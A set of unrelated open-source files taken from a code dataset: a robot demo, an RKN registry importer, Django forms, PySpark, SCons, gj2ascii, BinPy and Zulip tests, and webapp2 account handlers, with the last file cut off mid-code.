name="MOVE_TO_BOX_BY_VISION", act= move_to_box_by_vision, default_args={} ), State( name="PLACE_OBJECT_IN_THE_BOX", act= place_object_in_the_box, default_args={} ) ] print(states[0]) state_dict = {} for state in states: state_dict[state.name] = state start_state = states[0] main_loop(robot, start_state, state_dict, delay=0)
TheCamusean/DLRCev3
scripts/benchmarks/demo3.py
Python
mit
27,312
0.028412
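The demo3.py row above is organised as a finite-state machine: every act function takes (robot, frame, **kwargs) and returns a tuple of (next state name, current frame, keyword arguments for the next state), which main_loop then dispatches through state_dict. Neither the State class nor main_loop appears in this row, so the following is only a minimal sketch of that dispatch pattern under assumed names and signatures; in the real script the camera frame is presumably refreshed by the robot rather than threaded through exactly as shown.

# Minimal sketch (assumed names/signatures) of the state-machine dispatch used above.
class State(object):
    def __init__(self, name, act, default_args=None):
        self.name = name
        self.act = act
        self.default_args = default_args or {}


def main_loop(robot, start_state, state_dict, delay=0):
    state = start_state
    kwargs = dict(start_state.default_args)
    frame = None  # assumption: the real loop grabs frames from the robot camera
    while True:
        # Each act function returns (next_state_name, frame, kwargs_for_next_state),
        # e.g. ("GO_TO_BOX", frame, {"cluster": cluster, ...}) in the code above.
        next_name, frame, returned = state.act(robot, frame, **kwargs)
        state = state_dict[next_name]
        kwargs = dict(state.default_args)  # start from the next state's defaults...
        kwargs.update(returned)            # ...overridden by what the last state returned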
from rknfilter.targets import BaseTarget
from rknfilter.db import Resource, Decision, CommitEvery
from rknfilter.core import DumpFilesParser


class StoreTarget(BaseTarget):
    def __init__(self, *args, **kwargs):
        super(StoreTarget, self).__init__(*args, **kwargs)
        self._dump_files_parser = DumpFilesParser()

    def process(self):
        commit = CommitEvery(self._session)
        for content, decision, domains, urls, ips, _ in self._dump_files_parser.get_data():
            # TODO: move to models?
            resource = Resource.get_or_create(self._session, rkn_id=content['rkn_id'])
            if resource.id is None:
                resource.include_date = content['include_date']
                resource.entry_type = content['entry_type']
                resource.urgency_type = content['urgency_type']
                resource.block_type = content['block_type']
                resource.decision = Decision(
                    date=decision['decision_date'],
                    org=decision['decision_org'],
                    num=decision['decision_num']
                )
            resource.sync_m2m_proxy('domains_list', domains)
            resource.sync_m2m_proxy('urls_list', urls)
            resource.sync_m2m_proxy('ips_list', ips)
            commit()
        commit(force=True)
DmitryFillo/rknfilter
rknfilter/targets/store.py
Python
bsd-2-clause
1,324
0.002266
from django import forms
from django.contrib.auth.models import User as user_model
from django.contrib.auth.forms import UserCreationForm

from mc2.models import UserSettings


class UserSettingsForm(forms.ModelForm):
    settings_level = forms.ChoiceField(
        choices=UserSettings.SETTINGS_LEVEL_CHOICES,
        widget=forms.RadioSelect())

    class Meta:
        model = UserSettings
        fields = ('settings_level', )


class CreateAccountForm(UserCreationForm):
    """
    Form for creating a new user account.
    """
    first_name = forms.CharField(required=False)
    last_name = forms.CharField(required=False)
    email = forms.EmailField(required=True)

    def clean_email(self):
        '''
        Validate that the supplied email address is unique for the site.
        '''
        if user_model.objects.filter(
                email__iexact=self.cleaned_data['email']).exists():
            raise forms.ValidationError('This email address is already in use.'
                                        ' Please supply a different'
                                        ' email address.')
        return self.cleaned_data['email']
praekelt/mc2
mc2/forms.py
Python
bsd-2-clause
1,161
0
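clean_email in CreateAccountForm above rejects addresses that already exist on the site. A short hedged sketch of how such a form is typically exercised with Django's standard form API; the helper name and the surrounding view plumbing are illustrative, not taken from the repository.

from mc2.forms import CreateAccountForm


def try_create_account(post_data):
    # Standard Django form validation; clean_email() runs as part of is_valid().
    form = CreateAccountForm(data=post_data)
    if form.is_valid():
        # UserCreationForm.save() creates the user with a properly hashed password.
        return form.save()
    # On a duplicate address, form.errors['email'] carries the message raised above.
    return None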
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import sys from pyspark.rdd import PythonEvalType class PandasMapOpsMixin(object): """ Min-in for pandas map operations. Currently, only :class:`DataFrame` can use this class. """ def mapInPandas(self, func, schema): """ Maps an iterator of batches in the current :class:`DataFrame` using a Python native function that takes and outputs a pandas DataFrame, and returns the result as a :class:`DataFrame`. The function should take an iterator of `pandas.DataFrame`\\s and return another iterator of `pandas.DataFrame`\\s. All columns are passed together as an iterator of `pandas.DataFrame`\\s to the function and the returned iterator of `pandas.DataFrame`\\s are combined as a :class:`DataFrame`. Each `pandas.DataFrame` size can be controlled by `spark.sql.execution.arrow.maxRecordsPerBatch`. .. versionadded:: 3.0.0 Parameters ---------- func : function a Python native function that takes an iterator of `pandas.DataFrame`\\s, and outputs an iterator of `pandas.DataFrame`\\s. schema : :class:`pyspark.sql.types.DataType` or str the return type of the `func` in PySpark. The value can be either a :class:`pyspark.sql.types.DataType` object or a DDL-formatted type string. Examples -------- >>> from pyspark.sql.functions import pandas_udf >>> df = spark.createDataFrame([(1, 21), (2, 30)], ("id", "age")) >>> def filter_func(iterator): ... for pdf in iterator: ... yield pdf[pdf.id == 1] >>> df.mapInPandas(filter_func, df.schema).show() # doctest: +SKIP +---+---+ | id|age| +---+---+ | 1| 21| +---+---+ Notes ----- This API is experimental See Also -------- pyspark.sql.functions.pandas_udf """ from pyspark.sql import DataFrame from pyspark.sql.pandas.functions import pandas_udf assert isinstance(self, DataFrame) udf = pandas_udf( func, returnType=schema, functionType=PythonEvalType.SQL_MAP_PANDAS_ITER_UDF) udf_column = udf(*[self[col] for col in self.columns]) jdf = self._jdf.mapInPandas(udf_column._jc.expr()) return DataFrame(jdf, self.sql_ctx) def _test(): import doctest from pyspark.sql import SparkSession import pyspark.sql.pandas.map_ops globs = pyspark.sql.pandas.map_ops.__dict__.copy() spark = SparkSession.builder\ .master("local[4]")\ .appName("sql.pandas.map_ops tests")\ .getOrCreate() globs['spark'] = spark (failure_count, test_count) = doctest.testmod( pyspark.sql.pandas.map_ops, globs=globs, optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF) spark.stop() if failure_count: sys.exit(-1) if __name__ == "__main__": _test()
wangmiao1981/spark
python/pyspark/sql/pandas/map_ops.py
Python
apache-2.0
3,806
0.002365
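The mapInPandas docstring above already carries a doctest; as a complement, here is a hedged sketch of the batch-wise transformation style the method is intended for. The session setup, column names, and derived column are illustrative only.

from pyspark.sql import SparkSession

spark = SparkSession.builder.master("local[2]").appName("mapInPandas-sketch").getOrCreate()
df = spark.createDataFrame([(1, 21), (2, 30)], ("id", "age"))


def add_decade(batches):
    # 'batches' is an iterator of pandas.DataFrame; yield one DataFrame per input batch.
    for pdf in batches:
        yield pdf.assign(decade=pdf.age // 10)


df.mapInPandas(add_decade, schema="id long, age long, decade long").show()
spark.stop()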
"""SCons.Tool.g++ Tool-specific initialization for g++. There normally shouldn't be any need to import this module directly. It will usually be imported through the generic SCons.Tool.Tool() selection method. """ # # Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons" import os.path import re import subprocess import SCons.Tool import SCons.Util cplusplus = __import__('c++', globals(), locals(), []) compilers = ['g++'] def generate(env): """Add Builders and construction variables for g++ to an Environment.""" static_obj, shared_obj = SCons.Tool.createObjBuilders(env) cplusplus.generate(env) env['CXX'] = env.Detect(compilers) # platform specific settings if env['PLATFORM'] == 'aix': env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -mminimal-toc') env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1 env['SHOBJSUFFIX'] = '$OBJSUFFIX' elif env['PLATFORM'] == 'hpux': env['SHOBJSUFFIX'] = '.pic.o' elif env['PLATFORM'] == 'sunos': env['SHOBJSUFFIX'] = '.pic.o' # determine compiler version if env['CXX']: #pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'], pipe = SCons.Action._subproc(env, [env['CXX'], '--version'], stdin = 'devnull', stderr = 'devnull', stdout = subprocess.PIPE) if pipe.wait() != 0: return # -dumpversion was added in GCC 3.0. As long as we're supporting # GCC versions older than that, we should use --version and a # regular expression. #line = pipe.stdout.read().strip() #if line: # env['CXXVERSION'] = line line = pipe.stdout.readline() match = re.search(r'[0-9]+(\.[0-9]+)+', line) if match: env['CXXVERSION'] = match.group(0) def exists(env): return env.Detect(compilers)
makinacorpus/mapnik2
scons/scons-local-1.2.0/SCons/Tool/g++.py
Python
lgpl-2.1
3,111
0.0045
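The g++ tool above parses the output of "g++ --version" with a regular expression because -dumpversion only became available with GCC 3.0. The same extraction idea, pulled out of SCons as a small hedged sketch:

import re
import subprocess


def cxx_version(cxx="g++"):
    # Returns e.g. "11.4.0", or None if the compiler is missing or the output is unexpected.
    try:
        out = subprocess.check_output([cxx, "--version"], universal_newlines=True)
    except (OSError, subprocess.CalledProcessError):
        return None
    match = re.search(r"[0-9]+(\.[0-9]+)+", out.splitlines()[0])
    return match.group(0) if match else None


print(cxx_version())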
""" Unittests for gj2ascii CLI """ from __future__ import division import os import tempfile import unittest import click import emoji import fiona as fio import pytest import gj2ascii from gj2ascii import cli def test_complex(runner, expected_line_40_wide, line_file, compare_ascii): result = runner.invoke(cli.main, [ line_file, '--width', '40', '--char', '+', '--fill', '.', '--no-prompt', '--all-touched', '--iterate', '--crs', 'EPSG:26918' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_line_40_wide) def test_bad_fill_value(runner, poly_file): result = runner.invoke(cli.main, ['-c toolong', poly_file]) assert result.exit_code != 0 assert result.output.startswith('Usage:') assert 'Error:' in result.output assert 'must be a single character' in result.output def test_bad_rasterize_value(runner, poly_file): result = runner.invoke(cli.main, ['-f toolong', poly_file]) assert result.exit_code != 0 assert result.output.startswith('Usage:') assert 'Error:' in result.output assert 'must be a single character' in result.output def test_render_one_layer_too_many_args(runner, poly_file): result = runner.invoke(cli.main, [ poly_file, '--char', '-', '--char', '8' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'number' in result.output assert '--char' in result.output def test_different_width(runner, poly_file): fill = '+' value = '.' width = 62 result = runner.invoke(cli.main, [ '--width', width, poly_file, '--fill', fill, '--char', value, '--no-prompt' ]) assert result.exit_code == 0 for line in result.output.rstrip(os.linesep).splitlines(): if line.startswith((fill, value)): assert len(line.rstrip(os.linesep).split()) == width / 2 def test_iterate_wrong_arg_count(runner, poly_file): result = runner.invoke(cli.main, [ poly_file, '--iterate', '--char', '1', '--char', '2' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'arg' in result.output assert 'layer' in result.output def test_bbox(runner, poly_file, small_aoi_poly_line_file, compare_ascii): expected = os.linesep.join([ ' + + + +', ' + + +', ' + +', ' +', '+ +', '+ + +', '+ + +', '+ +', '+ + +', ' + +', ' + + +', ' + + + +', ' + + + + +', ' + + + + + +', ' + + + + + + +', '' ]) with fio.open(small_aoi_poly_line_file) as src: cmd = [ poly_file, '--width', '40', '--char', '+', '--bbox', ] + list(map(str, src.bounds)) result = runner.invoke(cli.main, cmd) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected.strip()) def test_exceed_auto_generate_colormap_limit(runner, poly_file): infiles = [poly_file for i in range(len(gj2ascii.ANSI_COLORMAP.keys()) + 2)] result = runner.invoke(cli.main, infiles) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'auto' in result.output assert 'generate' in result.output assert '--char' in result.output def test_default_char_map(runner, poly_file, compare_ascii): with fio.open(poly_file) as src: expected = gj2ascii.render(src) result = runner.invoke(cli.main, [ poly_file ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected.strip()) def test_same_char_twice(runner, poly_file, line_file, compare_ascii): width = 40 fill = '.' 
char = '+' with fio.open(poly_file) as poly, fio.open(line_file) as line: coords = list(poly.bounds) + list(line.bounds) bbox = (min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4])) expected = gj2ascii.render_multiple( [(poly, char), (line, char)], width=width, fill=fill, bbox=bbox) result = runner.invoke(cli.main, [ poly_file, line_file, '--width', width, '--char', char, '--char', char, '--fill', fill ]) assert result.exit_code == 0 assert compare_ascii(expected, result.output) def test_iterate_bad_property(runner, single_feature_wv_file): result = runner.invoke(cli.main, [ single_feature_wv_file, '--iterate', '--properties', 'bad-prop' ]) assert result.exit_code != 0 assert isinstance(result.exception, KeyError) def test_styled_write_to_file(runner, single_feature_wv_file, compare_ascii): with fio.open(single_feature_wv_file) as src: expected = gj2ascii.render(src, width=20, char='1', fill='0') with tempfile.NamedTemporaryFile('r+') as f: result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', 'NAME,ALAND', '--char', '1=red', '--fill', '0=blue', '--outfile', f.name ]) f.seek(0) assert result.exit_code == 0 assert result.output == '' assert compare_ascii(f.read().strip(), expected.strip()) def test_stack_too_many_args(runner, multilayer_file): result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--char', '+', '--char', '8', '--char', '0' # 2 layers but 3 values ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert '--char' in result.output assert 'number' in result.output assert 'equal' in result.output def test_iterate_too_many_layers(runner, multilayer_file): result = runner.invoke(cli.main, [ multilayer_file, '--iterate', '--no-prompt' ]) assert result.exit_code != 0 assert result.output.startswith('Error:') assert 'single layer' in result.output def test_multilayer_compute_colormap(runner, multilayer_file, compare_ascii): coords = [] for layer in ('polygons', 'lines'): with fio.open(multilayer_file, layer=layer) as src: coords += list(src.bounds) bbox = min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4]) rendered_layers = [] for layer, char in zip(('polygons', 'lines'), ('0', '1')): with fio.open(multilayer_file, layer=layer) as src: rendered_layers.append( gj2ascii.render(src, width=20, fill=' ', char=char, bbox=bbox)) expected = gj2ascii.stack(rendered_layers) # Explicitly define since layers are not consistently listed in order result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--width', '20' ]) assert result.exit_code == 0 assert compare_ascii(expected.strip(), result.output.strip()) def test_stack_layers(runner, multilayer_file, compare_ascii): expected = os.linesep.join([ '. + . . . . . . . . . . . + . . . . . .', '. + + + . . . . . . . . . . . . . . . .', '. . 8 8 8 8 8 8 8 . . . . 8 . . . . . .', '. . . 8 . . . . . . . . . 8 . . . . . .', '. . . . 8 . . . . + . . . . 8 . . . . .', '. . . . . 8 . . . + + . . . 8 . . . . .', '. . . . . . 8 . . + + + + . 8 . . . . .', '. . . . . 8 . . . . + + + + . 8 . . . .', '. . . . 8 . . . . . . 8 8 8 . 8 . . + .', '+ + + . 8 . . . 8 8 8 . + + . . 8 + + +', '+ + + 8 . . . . . . . . . . . . 8 + + +', '. . 8 . . . 8 . . + . . . . . . 8 + + .', '. . . 8 . . 8 8 + + . . . . . . . 8 + .', '. . . . 8 . 8 + 8 + . . . . . . . 8 + .', '. . . . 8 8 + + 8 + . . . . . . . . . .', '. . . . . 8 + + + 8 . . . . . . . . . .', '. . . . . . . . + + . . . . . . . . . .' 
]) result = runner.invoke(cli.main, [ multilayer_file + ',polygons,lines', '--char', '+', '--char', '8', '--fill', '.', '--width', '40' ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected) def test_write_to_file(runner, single_feature_wv_file, compare_ascii): expected = os.linesep.join([ '+-------+-----------+', '| NAME | Barbour |', '| ALAND | 883338808 |', '+-------+-----------+', '* * * * * * * * * *', '* * * * * * * * * *', '* * * + + + * + + +', '* * + + + + + + * *', '+ + + + + + * * * *', '+ + + + + * * * * *' ]) with tempfile.NamedTemporaryFile('r+') as f: result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', 'NAME,ALAND', '--iterate', '--fill', '*', '--outfile', f.name # --no-prompt should automatically happen in this case ]) f.seek(0) assert result.exit_code == 0 assert result.output == '' assert compare_ascii( f.read().strip(), expected) @pytest.mark.xfail( os.environ.get('TRAVIS', '').lower() == 'true', reason='Failing on Travis for an unknown reason.') def test_paginate_with_all_properties( runner, expected_all_properties_output, single_feature_wv_file, compare_ascii): result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--properties', '%all', '--iterate', '--no-prompt' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_all_properties_output) @pytest.mark.xfail( os.environ.get('TRAVIS', '').lower() == 'true', reason='Failing on Travis for an unknown reason.') def test_paginate_with_two_properties( runner, expected_two_properties_output, single_feature_wv_file, compare_ascii): result = runner.invoke(cli.main, [ single_feature_wv_file, '--width', '20', '--fill', '*', '--properties', 'NAME,ALAND', '--iterate', '--no-prompt' ]) assert result.exit_code == 0 assert compare_ascii(result.output, expected_two_properties_output) def test_simple(runner, expected_polygon_40_wide, poly_file, compare_ascii): result = runner.invoke(cli.main, [ poly_file, '--width', '40', '--char', '+', '--fill', '.', ]) assert result.exit_code == 0 assert compare_ascii(result.output.strip(), expected_polygon_40_wide) def test_cb_char_and_fill(): testvals = { 'a': [('a', None)], ('a', 'b'): [('a', None), ('b', None)], 'black': [(gj2ascii.DEFAULT_COLOR_CHAR['black'], 'black')], ('black', 'blue'): [ (gj2ascii.DEFAULT_COLOR_CHAR['black'], 'black'), (gj2ascii.DEFAULT_COLOR_CHAR['blue'], 'blue') ], ('+=red', '==yellow'): [('+', 'red'), ('=', 'yellow')], None: [] } # The callback can return a list of tuples or a list of lists. Force test to compare # list to list. 
for inval, expected in testvals.items(): expected = [list(i) for i in expected] actual = [list(i) for i in cli._cb_char_and_fill(None, None, inval)] assert expected == actual with pytest.raises(click.BadParameter): cli._cb_char_and_fill(None, None, 'bad-color') with pytest.raises(click.BadParameter): cli._cb_char_and_fill(None, None, ('bad-color')) def test_cb_properties(): for v in ('%all', None): assert v == cli._cb_properties(None, None, v) props = 'PROP1,PROP2,PROP3' assert props.split(',') == cli._cb_properties(None, None, props) def test_cb_multiple_default(): values = ('1', '2') assert values == cli._cb_multiple_default(None, None, values) values = '1' assert (values) == cli._cb_multiple_default(None, None, values) def test_cb_bbox(poly_file): with fio.open(poly_file) as src: assert None == cli._cb_bbox(None, None, None) assert src.bounds == cli._cb_bbox(None, None, src.bounds) # Bbox with invalid X values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (2, 0, 1, 0,)) # Bbox with invalid Y values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (0, 2, 0, 1)) # Bbox with invalid X and Y values with pytest.raises(click.BadParameter): cli._cb_bbox(None, None, (2, 2, 1, 1,)) def test_with_emoji(runner, poly_file, line_file): result = runner.invoke(cli.main, [ poly_file, line_file, '-c', ':water_wave:', '-c', ':+1:' ]) assert result.exit_code is 0 for c in (':water_wave:', ':+1:'): ucode = emoji.unicode_codes.EMOJI_ALIAS_UNICODE[c] assert ucode in result.output def test_no_style(runner, expected_polygon_40_wide, poly_file, compare_ascii): result = runner.invoke(cli.main, [ poly_file, '-c', '+', '--no-style', '-w', '40', '-f', '.' ]) assert result.exit_code is 0 assert compare_ascii(result.output.strip(), expected_polygon_40_wide) def test_print_colors(runner): result = runner.invoke(cli.main, [ '--colors' ]) assert result.exit_code is 0 for color in gj2ascii.DEFAULT_COLOR_CHAR.keys(): assert color in result.output
geowurster/gj2ascii
tests/test_cli.py
Python
bsd-3-clause
13,853
0.000361
from __future__ import print_function
from BinPy.connectors.connector import *
from BinPy.gates.tree import *
from BinPy.connectors.connector import *
from BinPy.gates.gates import *
from BinPy.combinational.combinational import *
from nose.tools import with_setup, nottest

'''
Testing backtrack() function for depths from 0 to 4.
'''


def get_tree_for_depth_checking(depth):
    # Gates for depth test
    g1 = AND(True, False)
    g2 = AND(True, False)
    g3 = AND(g1, g2)
    g4 = AND(True, False)
    g5 = AND(True, False)
    g6 = AND(g4, g5)
    g_final = AND(g3, g6)

    # Instance of Tree
    tree_inst = Tree(g_final, depth)
    tree_inst.backtrack()

    # Testing tree
    n1 = (g1, [True, False])
    n2 = (g2, [True, False])
    n4 = (g4, [True, False])
    n5 = (g5, [True, False])
    n3 = (g3, [n1, n2])
    n6 = (g6, [n4, n5])
    tree_testing = (g_final, [n3, n6])

    return tree_inst, tree_testing


def compare_trees(tree_inst, tree_testing, depth):
    if isinstance(tree_testing, tuple):
        if not tree_testing[0] == tree_inst.element:
            assert False
        if depth == 0:
            if len(tree_inst.sons) != 0:
                assert False
        else:
            for i in range(len(tree_testing[1])):
                compare_trees(tree_inst.sons[i], tree_testing[1][i], depth - 1)
    else:
        if not tree_testing == tree_inst.element:
            assert False


def backtrack_depth_test():
    for i in range(6):
        tree_inst, tree_testing = get_tree_for_depth_checking(i)
        compare_trees(tree_inst, tree_testing, i)


'''
Test to see if the set_depth method works
'''


def set_depth_test():
    tree_inst, tree_testing = get_tree_for_depth_checking(0)
    for i in range(1, 6):
        tree_inst.set_depth(i)
        tree_inst.backtrack()
        compare_trees(tree_inst, tree_testing, i)


'''
Test not following Cycles functionality
'''


def not_following_cycles_test():
    c1 = Connector(True)
    g1 = AND(c1, True)
    g2 = AND(g1, False)
    g2.set_output(c1)

    t_no_cycle = Tree(g2, 5, False)
    t_cycle = Tree(g2, 5, True)
    t_no_cycle.backtrack()
    t_cycle.backtrack()

    assert t_no_cycle.sons[0].sons[0].sons[0].sons == []
    assert t_cycle.sons[0].sons[0].sons[0].sons[0].element == g1
daj0ker/BinPy
BinPy/tests/tree_tests.py
Python
bsd-3-clause
2,286
0.000875
from django.conf import settings from zerver.lib.test_classes import WebhookTestCase from zerver.models import get_realm, get_system_bot class HelloWorldHookTests(WebhookTestCase): STREAM_NAME = "test" URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}&stream={stream}" PM_URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}" WEBHOOK_DIR_NAME = "helloworld" # Note: Include a test function per each distinct message condition your integration supports def test_hello_message(self) -> None: expected_topic = "Hello World" expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Marilyn Monroe](https://en.wikipedia.org/wiki/Marilyn_Monroe)**" # use fixture named helloworld_hello self.check_webhook( "hello", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", ) def test_goodbye_message(self) -> None: expected_topic = "Hello World" expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" # use fixture named helloworld_goodbye self.check_webhook( "goodbye", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", ) def test_pm_to_bot_owner(self) -> None: # Note that this is really just a test for check_send_webhook_message self.URL_TEMPLATE = self.PM_URL_TEMPLATE self.url = self.build_webhook_url() expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" self.send_and_test_private_message( "goodbye", expected_message=expected_message, content_type="application/x-www-form-urlencoded", ) def test_stream_error_pm_to_bot_owner(self) -> None: # Note that this is really just a test for check_send_webhook_message self.STREAM_NAME = "nonexistent" self.url = self.build_webhook_url() realm = get_realm("zulip") notification_bot = get_system_bot(settings.NOTIFICATION_BOT, realm.id) expected_message = "Your bot `webhook-bot@zulip.com` tried to send a message to stream #**nonexistent**, but that stream does not exist. Click [here](#streams/new) to create it." self.send_and_test_private_message( "goodbye", expected_message=expected_message, content_type="application/x-www-form-urlencoded", sender=notification_bot, ) def test_custom_topic(self) -> None: # Note that this is really just a test for check_send_webhook_message expected_topic = "Custom Topic" self.url = self.build_webhook_url(topic=expected_topic) expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**" self.check_webhook( "goodbye", expected_topic, expected_message, content_type="application/x-www-form-urlencoded", )
rht/zulip
zerver/webhooks/helloworld/tests.py
Python
apache-2.0
3,346
0.002092
# -*- coding: utf-8 -*- """ A real simple app for using webapp2 with auth and session. It just covers the basics. Creating a user, login, logout and a decorator for protecting certain handlers. Routes are setup in routes.py and added in main.py """ # standard library imports import logging # related third party imports import webapp2 from google.appengine.ext import ndb from google.appengine.api import taskqueue from webapp2_extras.auth import InvalidAuthIdError, InvalidPasswordError from webapp2_extras.i18n import gettext as _ from bp_includes.external import httpagentparser # local application/library specific imports import bp_includes.lib.i18n as i18n from bp_includes.lib.basehandler import BaseHandler from bp_includes.lib.decorators import user_required from bp_includes.lib import captcha, utils import bp_includes.models as models_boilerplate import forms as forms from google.appengine.api import memcache from google.appengine.api import channel import random import logging logger = logging.getLogger(__name__) class ContactHandler(BaseHandler): """ Handler for Contact Form """ def get(self): """ Returns a simple HTML for contact form """ if self.user: user_info = self.user_model.get_by_id(long(self.user_id)) if user_info.name or user_info.last_name: self.form.name.data = user_info.name + " " + user_info.last_name if user_info.email: self.form.email.data = user_info.email params = { "exception": self.request.get('exception') } return self.render_template('contact.html', **params) def post(self): """ validate contact form """ if not self.form.validate(): return self.get() remote_ip = self.request.remote_addr city = i18n.get_city_code(self.request) region = i18n.get_region_code(self.request) country = i18n.get_country_code(self.request) coordinates = i18n.get_city_lat_long(self.request) user_agent = self.request.user_agent exception = self.request.POST.get('exception') name = self.form.name.data.strip() email = self.form.email.data.lower() message = self.form.message.data.strip() template_val = {} try: # parsing user_agent and getting which os key to use # windows uses 'os' while other os use 'flavor' ua = httpagentparser.detect(user_agent) _os = ua.has_key('flavor') and 'flavor' or 'os' operating_system = str(ua[_os]['name']) if "name" in ua[_os] else "-" if 'version' in ua[_os]: operating_system += ' ' + str(ua[_os]['version']) if 'dist' in ua: operating_system += ' ' + str(ua['dist']) browser = str(ua['browser']['name']) if 'browser' in ua else "-" browser_version = str(ua['browser']['version']) if 'browser' in ua else "-" template_val = { "name": name, "email": email, "ip": remote_ip, "city": city, "region": region, "country": country, "coordinates": coordinates, "browser": browser, "browser_version": browser_version, "operating_system": operating_system, "message": message } except Exception as e: logging.error("error getting user agent info: %s" % e) try: subject = _("Contact") + " " + self.app.config.get('app_name') # exceptions for error pages that redirect to contact if exception != "": subject = "{} (Exception error: {})".format(subject, exception) body_path = "emails/contact.txt" body = self.jinja2.render_template(body_path, **template_val) email_url = self.uri_for('taskqueue-send-email') taskqueue.add(url=email_url, params={ 'to': self.app.config.get('contact_recipient'), 'subject': subject, 'body': body, 'sender': self.app.config.get('contact_sender'), }) message = _('Your message was sent successfully.') self.add_message(message, 'success') return 
self.redirect_to('contact') except (AttributeError, KeyError), e: logging.error('Error sending contact form: %s' % e) message = _('Error sending the message. Please try again later.') self.add_message(message, 'error') return self.redirect_to('contact') @webapp2.cached_property def form(self): return forms.ContactForm(self) class SecureRequestHandler(BaseHandler): """ Only accessible to users that are logged in """ @user_required def get(self, **kwargs): user_session = self.user user_session_object = self.auth.store.get_session(self.request) user_info = self.user_model.get_by_id(long(self.user_id)) user_info_object = self.auth.store.user_model.get_by_auth_token( user_session['user_id'], user_session['token']) try: params = { "user_session": user_session, "user_session_object": user_session_object, "user_info": user_info, "user_info_object": user_info_object, "userinfo_logout-url": self.auth_config['logout_url'], } return self.render_template('secure_zone.html', **params) except (AttributeError, KeyError), e: return "Secure zone error:" + " %s." % e class DeleteAccountHandler(BaseHandler): @user_required def get(self, **kwargs): chtml = captcha.displayhtml( public_key=self.app.config.get('captcha_public_key'), use_ssl=(self.request.scheme == 'https'), error=None) if self.app.config.get('captcha_public_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE" or \ self.app.config.get('captcha_private_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE": chtml = '<div class="alert alert-error"><strong>Error</strong>: You have to ' \ '<a href="http://www.google.com/recaptcha/whyrecaptcha" target="_blank">sign up ' \ 'for API keys</a> in order to use reCAPTCHA.</div>' \ '<input type="hidden" name="recaptcha_challenge_field" value="manual_challenge" />' \ '<input type="hidden" name="recaptcha_response_field" value="manual_challenge" />' params = { 'captchahtml': chtml, } return self.render_template('delete_account.html', **params) def post(self, **kwargs): challenge = self.request.POST.get('recaptcha_challenge_field') response = self.request.POST.get('recaptcha_response_field') remote_ip = self.request.remote_addr cResponse = captcha.submit( challenge, response, self.app.config.get('captcha_private_key'), remote_ip) if cResponse.is_valid: # captcha was valid... carry on..nothing to see here pass else: _message = _('Wrong image verification code. Please try again.') self.add_message(_message, 'error') return self.redirect_to('delete-account') if not self.form.validate() and False: return self.get() password = self.form.password.data.strip() try: user_info = self.user_model.get_by_id(long(self.user_id)) auth_id = "own:%s" % user_info.username password = utils.hashing(password, self.app.config.get('salt')) try: # authenticate user by its password user = self.user_model.get_by_auth_password(auth_id, password) if user: # Delete 